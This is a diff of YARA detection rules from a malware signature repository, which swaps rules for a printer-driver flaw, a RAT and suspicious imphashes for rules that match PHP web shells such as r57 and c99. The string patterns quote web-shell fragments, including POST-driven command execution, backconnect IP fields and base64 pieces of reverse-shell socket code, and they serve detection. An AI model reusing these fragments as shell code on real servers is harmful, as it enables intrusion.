-		author = "Florian Roth (Nextron Systems)"
-		id = "34cd648a-3e3f-5832-8abe-18507931eb3d"
-		date = "2021-07-20"
-		modified = "2023-12-05"
-		reference = "https://labs.sentinelone.com/cve-2021-3438-16-years-in-hiding-millions-of-printers-worldwide-vulnerable/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_cve_2021_3438_printdriver.yar#L4-L22"
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "44b53124-c8b6-545b-819f-77fd65e5d61b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5173-L5188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b58c2623c8fb84162c1c9390d0398639061ed5b1d4a8e007685e6fabe42bde54"
-		score = 70
+		logic_hash = "f97846fdaac949185b4ce6a25cc276f4ae4243d891acb18c3a3ce0c18b540976"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "7cc9ba2df7b9ea6bb17ee342898edd7f54703b93b6ded6a819e83a7ee9f938b4"
+		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
 
 	strings:
-		$s1 = "This String is from Device Driver@@@@@ !!!" ascii
-		$s2 = "\\DosDevices\\ssportc" wide fullword
+		$s0 = "'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash'," fullword
+		$s1 = "$name='ec371748dc2da624b35a4f8f685dd122'"
+		$s2 = "rst.void.ru"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of ( $s* ) and 1613606400 >= pe.timestamp
+		3 of them
 }
-rule SIGNATURE_BASE_Minirat_Gen_1 : FILE
+rule SIGNATURE_BASE__R577_Php_Php_R57_Shell_Php_Php_Spy_Php_Php_S_Php_Php
 {
 	meta:
-		description = "Detects Mini RAT malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "65d89762-2fd0-5c6a-b706-92d77a03089a"
-		date = "2018-01-22"
-		modified = "2023-12-05"
-		reference = "https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_darkcaracal.yar#L12-L30"
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "7a31b923-15e5-5af4-9ad0-8d261fedf7c4"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5189-L5205"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "53c4ba16ae2c3eb3a6c7371e7fc8b962cfbee5b70abd8267294834eac3e55769"
+		logic_hash = "764a374c1e4acec8978db1e7e7e326c4fa95c6f92e1ca5a6d7f892bb05ecd289"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b"
-		hash2 = "b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d"
-		hash3 = "ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2"
-		hash4 = "ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790"
-		hash5 = "675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd"
+		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "8023394542cddf8aee5dec6072ed02b5"
+		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash3 = "817671e1bdc85e04cc3440bbd9288800"
 
 	strings:
-		$x1 = "\\Mini rat\\" ascii
-		$x2 = "\\Projects\\ali\\Clever Components v7\\" ascii
+		$s0 = "echo ws(2).$lb.\" <a"
+		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']"
+		$s3 = "if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?(\"dir\"):(\"l"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 7000KB and 1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_MAL_Fake_Document_Software_Indicators_Nov23 : FILE
+rule SIGNATURE_BASE__Wacking_Php_Php_1_Specialshell_99_Php_Php_C100_Php
 {
 	meta:
-		description = "Detects indicators of fake document/image utility software that acts as a downloader for additional malware"
-		author = "Jonathan Peters"
-		id = "231474cd-1ec9-5738-bf48-ef707689056d"
-		date = "2023-11-13"
-		modified = "2024-04-24"
-		reference = "https://nochlab.blogspot.com/2023/09/net-in-javascript-fake-pdf-converter.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_fake_document_software.yar#L1-L20"
+		description = "Semi-Auto-generated  - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "3dac5550-598a-5a0f-95c3-2e0162a686ee"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5206-L5222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5f0a088bf672559fbac90313768d41b79be7f1f56c6ddb36f0dcd265a07f98b2"
-		score = 80
+		logic_hash = "0d32fc00ba2602a1140dc9030894bb9524c55b95c445a08f2bf6f8fc60108e64"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "ac5356ae011effb9d401bf428c92a48cf82c9b61f4c24a29a9718e3379f90f1d"
-		hash2 = "d1c29c2243c511ca3264ad568a6be62f374e104b903eca93debce6691e1c5007"
+		tags = ""
+		super_rule = 1
+		hash0 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash1 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash2 = "09609851caa129e40b0d56e90dfc476c"
+		hash3 = "38fd7e45f9c11a37463c3ded1c76af4c"
 
 	strings:
-		$ = "tweakscode.com" wide
-		$ = "www.createmygif.com" wide
-		$ = "www.videownload.com" wide
-		$ = "www.pdfconverterz.com" wide
-		$ = "www.pdfconvertercompare.com" wide
+		$s0 = "if(eregi(\"./shbd $por\",$scan))"
+		$s1 = "$_POST['backconnectip']"
+		$s2 = "$_POST['backcconnmsg']"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		1 of them
 }
-
-rule SIGNATURE_BASE_MAL_Malware_Imphash_Mar23_1 : HIGHVOL FILE
+rule SIGNATURE_BASE__R577_Php_Php_R57_Php_Php_R57_Shell_Php_Php_Spy_Php_Php_S_Php_Php
 {
 	meta:
-		description = "Detects malware by known bad imphash or rich_pe_header_hash"
-		author = "Arnim Rupp"
-		id = "fb398c26-e9ac-55f9-b605-6b763021e96a"
-		date = "2023-03-20"
-		modified = "2023-03-22"
-		reference = "https://yaraify.abuse.ch/statistics/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_imphash_detection.yar#L4-L90"
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "093892f6-ff53-5bd1-b7b2-fea21a9258aa"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5223-L5240"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "167dde6bd578cbfcc587d5853e7fc2904cda10e737ca74b31df52ba24db6e7bc"
-		hash = "0a25a78c6b9df52e55455f5d52bcb3816460001cae3307b05e76ac70193b0636"
-		hash = "d87a35decd0b81382e0c98f83c7f4bf25a2b25baac90c9dcff5b5a147e33bcc8"
-		hash = "5783bf969c36f13f4365f4cae3ec4ee5d95694ff181aba74a33f4959f1f19e8b"
-		hash = "4ca925b0feec851d787e7ee42d263f4c08b0f73f496049bdb5d967728ff91073"
-		hash = "9c2d2fa9c32fdff1828854e8cc39160dae73a4f90fb89b82ef6d853b63035663"
-		hash = "2c53d58f30b2ee1a2a7746e20f136c34d25d0214261783fc67e119329d457c2a"
-		hash = "5e83747015b0589b4f04b0db981794adf53274076c1b4acf717e3ff45eca0249"
-		hash = "ceaa0af90222ff3a899b9a360f6328cbda9ec0f5fbd18eb44bdc440470bb0247"
-		hash = "82fb1ba998dfee806a513f125bb64c316989c36c805575914186a6b45da3b132"
-		hash = "cb41d2520995abd9ba8ccd42e53d496a66da392007ea6aebd4cbc43f71ad461a"
-		hash = "c7bd758506b72ee6db1cc2557baf745bf9e402127d8e49266cc91c90f3cf3ed5"
-		hash = "e6e0d60f65a4ea6895ff97df340f6d90942bbfa402c01bf443ff5b4641ff849f"
-		hash = "e8ddef9fa689e98ba2d48260aea3eb8fa41922ed718b7b9135df6426b3ddf126"
-		hash = "ad57d77aba6f1bf82e0affe4c0ae95964be45fb3b7c2d6a0e08728e425ecd301"
-		hash = "483df98eb489899bc89c6a0662ca8166c9b77af2f6bedebd17e61a69211843d9"
-		hash = "a65ed85851d8751e6fe6a27ece7b3879b90866a10f272d8af46fb394b46b90a9"
-		hash = "09081e04f3228d6ef2efc1108850958ed86026e4dfda199852046481f4711565"
-		hash = "1b2c9054f44f7d08cffe7e2d9127dbd96206ab2c15b63ebf6120184950336ae1"
-		hash = "257887d1c84eb15abb2c3c0d7eb9b753ca961d905f4979a10a094d0737d97138"
-		hash = "1cbad8b58dbd1176e492e11f16954c3c254b5169dde52b5ad6d0d3c51930abf8"
-		hash = "a9897fd2d5401071a8219b05a3e9b74b64ad67ab75044b3e41818e6305a8d7b9"
-		hash = "aeac45fbc5d2a59c9669b9664400aeaf6699d76a57126d2f437833a3437a693e"
-		hash = "7b4c4d4676fab6c009a40d370e6cb53ea4fd73b09c23426fbaccc66d652f2a00"
-		hash = "b07f6873726276842686a6a6845b361068c3f5ce086811db05c1dc2250009cd0"
-		hash = "d1b3afebcacf9dd87034f83d209b42b0d79e66e08c0a897942fbe5fbd6704a0e"
-		hash = "074d52be060751cf213f6d0ead8e9ab1e63f055ae79b5fcbe4dd18469deea12b"
-		hash = "84d1fdef484fa9f637ae3d6820c996f6c5cf455470e8717ad348a3d80d2fb8e0"
-		hash = "437da123e80cfd10be5f08123cd63cfc0dc561e17b0bef861634d60c8a134eda"
-		hash = "f76c36eb22777473b88c6a5fc150fd9d6b5fac5b2db093f0ccd101614c46c7e7"
-		hash = "5498b7995669877a410e1c2b68575ca94e79014075ef5f89f0f1840c70ebf942"
-		hash = "af4e633acfba903e7c92342b114c4af4e694c5cfaea3d9ea468a4d322b60aa85"
-		hash = "d7d870f5afab8d4afa083ea7d7ce6407f88b0f08ca166df1a1d9bdc1a46a41b3"
-		hash = "974209d88747fbba77069bb9afa9e8c09ee37ae233d94c82999d88dfcd297117"
-		hash = "f2d99e7d3c59adf52afe0302b298c7d8ea023e9338c2870f74f11eaa0a332fc4"
-		hash = "b32c93be9320146fc614fafd5e6f1bb8468be83628118a67eb01c878f941ee5d"
-		hash = "bbd99acc750e6457e89acbc5da8b2a63b4ef01d4597d160e9cde5dc8bd04cf74"
-		hash = "dbff5ca3d1e18902317ab9c50be4e172640a8141e09ec13dcca986f2ec1dc395"
-		hash = "3ee1741a649f0b97bbeb05b6f9df97afda22c82e1e870177d8bdd34141ef163c"
-		hash = "222096fc800c8ea2b0e530302306898b691858324dbe5b8357f90407e9665b85"
-		hash = "b9995d1987c4e8b6fb30d255948322cfad9cc212c7f8f4c5db3ac80e23071533"
-		hash = "a6a92ea0f27da1e678c15beb263647de43f68608afe82d6847450f16a11fe6c0"
-		hash = "866e3ea86671a62b677214f07890ddf7e8153bec56455ad083c800e6ab51be37"
-		logic_hash = "dcb4d9a1ca83bbd26178895f20f9ab443f48f42aa3ad3df042c763c24ce8c047"
+		logic_hash = "afbd2103b0c953d6aec070ba450f43e567560bc9743423a5731cd4d6e5e36bb6"
 		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
-		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
+		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash2 = "8023394542cddf8aee5dec6072ed02b5"
+		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash4 = "817671e1bdc85e04cc3440bbd9288800"
 
 	strings:
-		$fp1 = "Win32 Cabinet Self-Extractor" wide
-		$fp2 = "EXTRACTOPT" ascii fullword
+		$s1 = "if(rmdir($_POST['mk_name']))"
+		$s2 = "$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>"
+		$s3 = "if(unlink($_POST['mk_name'])) echo \"<table width=100% cellpadding=0 cell"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "9ee34731129f4801db97fd66adbfeaa0" or pe.imphash ( ) == "f9e8597c55008e10a8cdc8a0764d5341" or pe.imphash ( ) == "0a76016a514d8ed3124268734a31e2d2" or pe.imphash ( ) == "d3cbd6e8f81da85f6bf0529e69de9251" or pe.imphash ( ) == "d8b32e731e5438c6329455786e51ab4b" or pe.imphash ( ) == "cdf5bbb8693f29ef22aef04d2a161dd7" or pe.imphash ( ) == "890e522b31701e079a367b89393329e6" or pe.imphash ( ) == "bf5a4aa99e5b160f8521cadd6bfe73b8" or pe.imphash ( ) == "646167cce332c1c252cdcb1839e0cf48" or pe.imphash ( ) == "9f4693fc0c511135129493f2161d1e86" or pe.imphash ( ) == "b4c6fff030479aa3b12625be67bf4914" ) and not 1 of ( $fp* )
+		2 of them
 }
-
-rule SIGNATURE_BASE_HKTL_Imphashes_Aug22_1 : FILE
+rule SIGNATURE_BASE__W_Php_Php_Wacking_Php_Php_Sses_Php_Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Detects different hacktools based on their imphash"
-		author = "Florian Roth"
-		id = "e1d4dde6-16ad-5495-b3a7-01a86c830761"
-		date = "2022-08-17"
-		modified = "2023-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_imphash_detection.yar#L93-L192"
+		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "81480945-b684-50b6-9431-4ab7a786b214"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5241-L5257"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e76701b889138f9635cfe3a2f08710db3a6f0a3c3a15faa705ff0904d0566a1f"
-		score = 80
+		logic_hash = "9bbcb687c83c01ad52e8978a60e604a74f10c33a63af3b91d0286b30dea42890"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash3 = "09609851caa129e40b0d56e90dfc476c"
+
+	strings:
+		$s0 = "\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mvi"
+		$s1 = "echo \"<b>Execute file:</b><form action=\\\"\".$surl.\"\\\" method=POST><inpu"
+		$s2 = "\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswd"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( pe.imphash ( ) == "bcca3c247b619dcd13c8cdff5f123932" or pe.imphash ( ) == "3a19059bd7688cb88e70005f18efc439" or pe.imphash ( ) == "bf6223a49e45d99094406777eb6004ba" or pe.imphash ( ) == "0c106686a31bfe2ba931ae1cf6e9dbc6" or pe.imphash ( ) == "0d1447d4b3259b3c2a1d4cfb7ece13c3" or pe.imphash ( ) == "1b0369a1e06271833f78ffa70ffb4eaf" or pe.imphash ( ) == "4c1b52a19748428e51b14c278d0f58e3" or pe.imphash ( ) == "4d927a711f77d62cebd4f322cb57ec6f" or pe.imphash ( ) == "66ee036df5fc1004d9ed5e9a94a1086a" or pe.imphash ( ) == "672b13f4a0b6f27d29065123fe882dfc" or pe.imphash ( ) == "6bbd59cea665c4afcc2814c1327ec91f" or pe.imphash ( ) == "725bb81dc24214f6ecacc0cfb36ad30d" or pe.imphash ( ) == "9528a0e91e28fbb88ad433feabca2456" or pe.imphash ( ) == "9da6d5d77be11712527dcab86df449a3" or pe.imphash ( ) == "a6e01bc1ab89f8d91d9eab72032aae88" or pe.imphash ( ) == "b24c5eddaea4fe50c6a96a2a133521e4" or pe.imphash ( ) == "d21bbc50dcc169d7b4d0f01962793154" or pe.imphash ( ) == "fcc251cceae90d22c392215cc9a2d5d6" or pe.imphash ( ) == "23867a89c2b8fc733be6cf5ef902f2d1" or pe.imphash ( ) == "a37ff327f8d48e8a4d2f757e1b6e70bc" or pe.imphash ( ) == "f9a28c458284584a93b14216308d31bd" or pe.imphash ( ) == "6118619783fc175bc7ebecff0769b46e" or pe.imphash ( ) == "959a83047e80ab68b368fdb3f4c6e4ea" or pe.imphash ( ) == "563233bfa169acc7892451f71ad5850a" or pe.imphash ( ) == "87575cb7a0e0700eb37f2e3668671a08" or pe.imphash ( ) == "13f08707f759af6003837a150a371ba1" or pe.imphash ( ) == "1781f06048a7e58b323f0b9259be798b" or pe.imphash ( ) == "233f85f2d4bc9d6521a6caae11a1e7f5" or pe.imphash ( ) == "24af2584cbf4d60bbe5c6d1b31b3be6d" or pe.imphash ( ) == "632969ddf6dbf4e0f53424b75e4b91f2" or pe.imphash ( ) == "713c29b396b907ed71a72482759ed757" or pe.imphash ( ) == "749a7bb1f0b4c4455949c0b2bf7f9e9f" or pe.imphash ( ) == "8628b2608957a6b0c6330ac3de28ce2e" or pe.imphash ( ) == "8b114550386e31895dfab371e741123d" or pe.imphash ( ) == "94cb940a1a6b65bed4d5a8f849ce9793" or pe.imphash ( ) == "9d68781980370e00e0bd939ee5e6c141" or pe.imphash ( ) == "b18a1401ff8f444056d29450fbc0a6ce" or pe.imphash ( ) == "cb567f9498452721d77a451374955f5f" or pe.imphash ( ) == "730073214094cd328547bf1f72289752" or pe.imphash ( ) == "17b461a082950fc6332228572138b80c" or pe.imphash ( ) == "dc25ee78e2ef4d36faa0badf1e7461c9" or pe.imphash ( ) == "819b19d53ca6736448f9325a85736792" or pe.imphash ( ) == "829da329ce140d873b4a8bde2cbfaa7e" or pe.imphash ( ) == "c547f2e66061a8dffb6f5a3ff63c0a74" or pe.imphash ( ) == "0588081ab0e63ba785938467e1b10cca" or pe.imphash ( ) == "0d9ec08bac6c07d9987dfd0f1506587c" or pe.imphash ( ) == "bc129092b71c89b4d4c8cdf8ea590b29" or pe.imphash ( ) == "4da924cf622d039d58bce71cdf05d242" or pe.imphash ( ) == "e7a3a5c377e2d29324093377d7db1c66" or pe.imphash ( ) == "9a9dbec5c62f0380b4fa5fd31deffedf" or pe.imphash ( ) == "af8a3976ad71e5d5fdfb67ddb8dadfce" or pe.imphash ( ) == "0c477898bbf137bbd6f2a54e3b805ff4" or pe.imphash ( ) == "0ca9f02b537bcea20d4ea5eb1a9fe338" or pe.imphash ( ) == "3ab3655e5a14d4eefc547f4781bf7f9e" or pe.imphash ( ) == "e6f9d5152da699934b30daab206471f6" or pe.imphash ( ) == "3ad59991ccf1d67339b319b15a41b35d" or pe.imphash ( ) == "ffdd59e0318b85a3e480874d9796d872" or pe.imphash ( ) == "0cf479628d7cc1ea25ec7998a92f5051" or pe.imphash ( ) == "07a2d4dcbd6cb2c6a45e6b101f0b6d51" or pe.imphash ( ) == "d6d0f80386e1380d05cb78e871bc72b1" or pe.imphash ( ) == "38d9e015591bbfd4929e0d0f47fa0055" or pe.imphash ( ) == "0e2216679ca6e1094d63322e3412d650" or pe.imphash ( ) == "ada161bf41b8e5e9132858cb54cab5fb" or pe.imphash ( ) == "2a1bc4913cd5ecb0434df07cb675b798" or pe.imphash ( ) == "11083e75553baae21dc89ce8f9a195e4" or pe.imphash ( ) == "a23d29c9e566f2fa8ffbb79267f5df80" or pe.imphash ( ) == "4a07f944a83e8a7c2525efa35dd30e2f" or pe.imphash ( ) == "767637c23bb42cd5d7397cf58b0be688" or pe.imphash ( ) == "14c4e4c72ba075e9069ee67f39188ad8" or pe.imphash ( ) == "3c782813d4afce07bbfc5a9772acdbdc" or pe.imphash ( ) == "7d010c6bb6a3726f327f7e239166d127" or pe.imphash ( ) == "89159ba4dd04e4ce5559f132a9964eb3" or pe.imphash ( ) == "6f33f4a5fc42b8cec7314947bd13f30f" or pe.imphash ( ) == "5834ed4291bdeb928270428ebbaf7604" or pe.imphash ( ) == "5a8a8a43f25485e7ee1b201edcbc7a38" or pe.imphash ( ) == "dc7d30b90b2d8abf664fbed2b1b59894" or pe.imphash ( ) == "41923ea1f824fe63ea5beb84db7a3e74" or pe.imphash ( ) == "3de09703c8e79ed2ca3f01074719906b" or pe.imphash ( ) == "a53a02b997935fd8eedcb5f7abab9b9f" or pe.imphash ( ) == "e96a73c7bf33a464c510ede582318bf2" or pe.imphash ( ) == "32089b8851bbf8bc2d014e9f37288c83" or pe.imphash ( ) == "09D278F9DE118EF09163C6140255C690" or pe.imphash ( ) == "03866661686829d806989e2fc5a72606" or pe.imphash ( ) == "e57401fbdadcd4571ff385ab82bd5d6d" or pe.imphash ( ) == "84B763C45C0E4A3E7CA5548C710DB4EE" or pe.imphash ( ) == "19584675d94829987952432e018d5056" or pe.imphash ( ) == "330768a4f172e10acb6287b87289d83b" )
+		1 of them
 }
-
-rule SIGNATURE_BASE_SUSP_Imphash_Mar23_2 : HIGHVOL FILE
+rule SIGNATURE_BASE_Multiple_Php_Webshells
 {
 	meta:
-		description = "Detects imphash often found in malware samples (Zero hits with with search for 'imphash:x p:0' on Virustotal)"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b739d540-5d9f-53b3-9e42-a514dc972e8d"
-		date = "2023-03-23"
-		modified = "2023-11-25"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_imphash_detection.yar#L194-L295"
+		description = "Semi-Auto-generated  - from files multiple_php_webshells"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5259-L5280"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4"
-		hash = "14ec56489fbcc3c7f1ef9a4d4a80ff302a5e233cdc4429a29c635a88fb1278d6"
-		hash = "13731912823d6ce01c28a8d7d7f961505f461620bb35adbb409d4954ba1f4b8e"
-		hash = "15e59cc5d7b83e63d40dbfd8406701cb4decd31353f68fda47238d073c87e4ea"
-		hash = "13e5bb40be20b1a0bc28081ce7798f339c28c9652cb37b538c29872dfd0cd51d"
-		hash = "16f963afdb30b38ba4b8b98ce56a37626e9fd87de9eba5f9903d2ba7f8a77788"
-		hash = "168f22d02304ce66be88d2370c8fa7c7d9aa2ccf80f8e376edfeabfc9b96c73d"
-		hash = "9e7701450dbcbd35083e34df935bd77a95735c4b441e0fc8eacd543a621f2fa5"
-		hash = "51205c100702b21cce600692d69f3b108f49228e53f36678dd8b39434406526b"
-		hash = "c9b48e8b0e7c6fa75886554659bc0529e454d84b29daa07bd4323aca9a33f607"
-		hash = "ba5c06703bd3c093afa89e45d86aaf6c151fbaef44ebf3b65c97f3b376a88c72"
-		hash = "7281afc138e8e898aee16d415cd02a29dc5dedda5b11c23934aac0ebd208373b"
-		hash = "10a091b2468a8286f7b1a580d8923aef48856b43014e849035f05c4dbdc0a413"
-		hash = "56c04e76427bd982be83799d0a435732193d7bf5a70cdeba5eb63eaf0d4ebb77"
-		hash = "0aa8b7eddc4792a82f247702442c04e50173bd7712a4b596545916480942853b"
-		hash = "627f043ad875c182682149653363b7f856dd618d169821b18df7bc9cdf6269d8"
-		hash = "e1df460fd99c4f901859f3a8ec23b041ba9f4b79897dec349a96d6a27fb3e335"
-		hash = "f10ecbd8031ce85b782c59682ff32301a65e0975687977688771f1057fb063d1"
-		hash = "1bc7b8932b5b077b359c79e7ca664938b7a487a4e7e6b99d6647d6803bc677c5"
-		hash = "01f81029a5e93cbfecfbc81cbd4a2ffd1bb1b6159e2a144a21e58caf8dab9661"
-		hash = "cd33a71f71e2971667bacb0da71f2d36073777993b9581ec90bbf042162c3530"
-		hash = "4aab991149cb2dc8c0c0a323af3acbbd73d6a22177910ef3af92b05ae7c9ae7b"
-		hash = "df05fa3983c9e623388231d366dba4e435575ca53421d3f0bcb0fb346dd971d4"
-		hash = "14de3584fe7108386f7637c2bd343f30341c0fa2102d52bb35ee772b5b7672f0"
-		hash = "c4d9ad5cffd9aa13dfe3acbf0905810e28ff96d231541d7e209327ca5b0b24fe"
-		hash = "5e0bed2269dc34c6cc2db30b0a53282e6debb85b3c90a857d1be4cfd06312211"
-		hash = "3aa13e72382a2d7da592273b8c18a42106b65db528e16b6066646812e81555c4"
-		hash = "244c4a930e3644ffb96bf3ab33e8c8c0f94ed9fe6a8b2fc45fc8e9b6471ef3a8"
-		hash = "f00848b8edeeb5a668bf7e89e3f33f438b2f5d5cf130596a8ed2531e21be6d81"
-		hash = "5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e"
-		logic_hash = "c6482cbc01a880ffd3056d28a2fde8f87402b1f85d36075c1f0b50788d469ca3"
-		score = 65
+		logic_hash = "d55c96febd64107273001edadbda6d0a1b4b00e35fb41b46561b49fca6a9bd1b"
+		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
-		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
+		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "be0f67f3e995517d18859ed57b4b4389"
+		hash3 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash4 = "8023394542cddf8aee5dec6072ed02b5"
+		hash5 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash6 = "817671e1bdc85e04cc3440bbd9288800"
+		hash7 = "7101fe72421402029e2629f3aaed6de7"
+		hash8 = "f618f41f7ebeb5e5076986a66593afd1"
+
+	strings:
+		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
+		$s2 = "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0"
+		$s4 = "A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg"
 
 	condition:
